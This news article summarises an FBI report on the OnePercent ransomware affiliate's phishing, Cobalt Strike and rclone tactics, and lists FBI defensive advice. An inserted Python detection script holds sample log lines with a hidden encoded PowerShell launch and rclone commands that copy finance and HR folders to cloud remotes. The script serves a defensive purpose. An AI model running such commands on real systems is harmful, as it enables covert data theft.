Friday, October 22, 2021

A look into the tactics of a ransomware affiliate from the FBI

Infosec pros can now study the tactics of a ransomware affiliate gang that has been attacking U.S. organizations since late last year, information which can help them defend against some attacks.

The intel comes from the FBI, which this week issued a report on a gang calling itself the OnePercent Group.

The name apparently comes from its threat to release one per cent of a victim organization’s stolen data if a ransom isn’t paid.

Affiliate groups are gangs that take advantage of the ransomware-as-a-service offerings of big ransomware developers like REvil/Sodinokibi, Darkside, Dharma, LockBit and others. For a monthly fee, affiliates get the bulk of a ransom, with the developer getting about 20 to 30 per cent of the payment.

According to the report, like most ransomware attackers the OnePercent Group sends out phishing emails with a malicious Microsoft Word or Excel attachment, with the payload executing through a macro. This leads to the download of the IcedID banking trojan. According to the Center for Internet Security, IcedID (also known as BokBot) is a modular banking trojan that targets user financial information and is capable of acting as a dropper for other malware.

This gang uses it to download the Cobalt Strike threat emulation software. A legitimate testing tool, it has become a favourite aid for threat actors. According to Malpedia, Cobalt Strike deploys an in-memory agent named ‘Beacon’ on the victim machine which can be used for command execution, keylogging, file transfer, SOCKS proxying, privilege escalation, mimikatz (for saving authentication credentials), port scanning and lateral movement through and across networks. The FBI report notes this group uses Cobalt Strike in part to move laterally through PowerShell remoting.

For copying and exfiltrating data prior to deploying ransomware this gang uses rclone, a command line program, to manage files on cloud storage.
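As an added example (not from the FBI report or this article), the following Python pass runs over constructed process-creation log lines and flags each stage of the chain described above: an Office macro launching a script host, a command run through a PowerShell remoting session, and an rclone transfer to a named remote. The log format, hostnames and file paths are constructed for the example, and the process names used are assumptions about a typical Windows host.

```python
import re

# Process names for each stage of the chain described above. The log format,
# hostnames and paths below are constructed for this example, not taken from the FBI report.
OFFICE_PARENTS = {"winword.exe", "excel.exe"}
SCRIPT_CHILDREN = {"powershell.exe", "cmd.exe", "wscript.exe", "mshta.exe", "rundll32.exe"}
REMOTING_HOST = "wsmprovhost.exe"  # Windows host process for PowerShell remoting (WinRM) sessions

LOG_RE = re.compile(r'host="(?P<host>[^"]*)" parent="(?P<parent>[^"]*)" image="(?P<image>[^"]*)" cmd="(?P<cmd>[^"]*)"')
# rclone verb followed by a named remote ("name:path"); a single drive letter such as "D:" does not match
RCLONE_CMD_RE = re.compile(r"\b(copy|sync|move)\b.*\s[a-z][a-z0-9_-]+:")

def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def classify(line: str):
    """Return the chain stage a process-creation line matches, or None."""
    m = LOG_RE.search(line)
    if not m:
        return None
    parent, image, cmd = basename(m["parent"]), basename(m["image"]), m["cmd"].lower()
    if parent in OFFICE_PARENTS and image in SCRIPT_CHILDREN:
        return "office-macro-child"   # macro in the phishing attachment starting a script host
    if parent == REMOTING_HOST:
        return "remoting-child"       # command executed inside a PowerShell remoting session
    if image == "rclone.exe" or RCLONE_CMD_RE.search(cmd):
        return "rclone-transfer"      # data staged to cloud storage; the cmd check also catches a renamed rclone
    return None

def scan(log: str):
    """Return a list of (host, stage) for every matching line, in log order."""
    hits = []
    for line in log.splitlines():
        stage = classify(line)
        if stage:
            hits.append((LOG_RE.search(line)["host"], stage))
    return hits

SAMPLE_LOG = r'''host="WS01" parent="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" image="C:\Windows\System32\cmd.exe" cmd="cmd /c powershell -w hidden -enc BASE64BLOB"
host="WS01" parent="C:\Windows\explorer.exe" image="C:\Windows\System32\notepad.exe" cmd="notepad.exe"
host="SRV02" parent="C:\Windows\System32\wsmprovhost.exe" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd="powershell -c whoami"
host="FS01" parent="C:\Windows\System32\cmd.exe" image="C:\Users\Public\rclone.exe" cmd="rclone copy D:\Finance remote1:staging -q"
host="FS01" parent="C:\Windows\System32\cmd.exe" image="C:\Users\Public\svc64.exe" cmd="svc64.exe sync D:\HR mega-acct:dump --config C:\Users\Public\r.conf"'''

if __name__ == "__main__":
    for host, stage in scan(SAMPLE_LOG):
        print(f"{host}: {stage}")
```

Name-based matching is a heuristic; the rclone hashes published in the report complement it for the unrenamed binary.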


Once the ransomware is successfully deployed, the report says, the victim will receive phone calls with ransom demands through spoofed phone numbers. Victims are also provided a ProtonMail email address for further communication. The actors will persistently demand to speak with a victim company’s designated negotiator or otherwise threaten to publish the stolen data. When a victim company does not respond, the report says, the actors send subsequent threats to publish the victim company’s stolen data.

The report also includes indicators of compromise that security teams can watch for, including hashes associated with rclone.

The FBI urges organizations to do the following to reduce the odds of being victimized by ransomware. It’s also good advice for fending off any cyber attack:

• back-up critical data offline;
• ensure administrators are not using “Admin Approval” mode;
• implement Microsoft LAPS (Local Administrator Password Solution), if possible;
• ensure copies of critical data are in the cloud or on an external hard drive or storage device. This information should not be accessible from the compromised network;
• secure your back-ups and ensure data is not accessible for modification or deletion from the system where the original data resides;
• keep computers, devices, and applications patched and up-to-date;
• consider adding a coloured email banner that clearly identifies emails received from outside your organization. This helps alert users to malicious emails that purport to be from fellow employees;
• disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs;
• audit user accounts with administrative privileges and configure access controls to give users the least privilege needed for their work;
• use network segmentation to separate critical data;
• require users to adopt multi-factor authentication with strong passphrases.

Howard Solomon
Currently a freelance writer, I'm the former editor of ITWorldCanada.com and Computing Canada. An IT journalist since 1997, I've written for several of ITWC's sister publications including ITBusiness.ca and Computer Dealer News. Before that I was a staff reporter at the Calgary Herald and the Brampton (Ont.) Daily Times. I can be reached at hsolomon [@] soloreporter.com
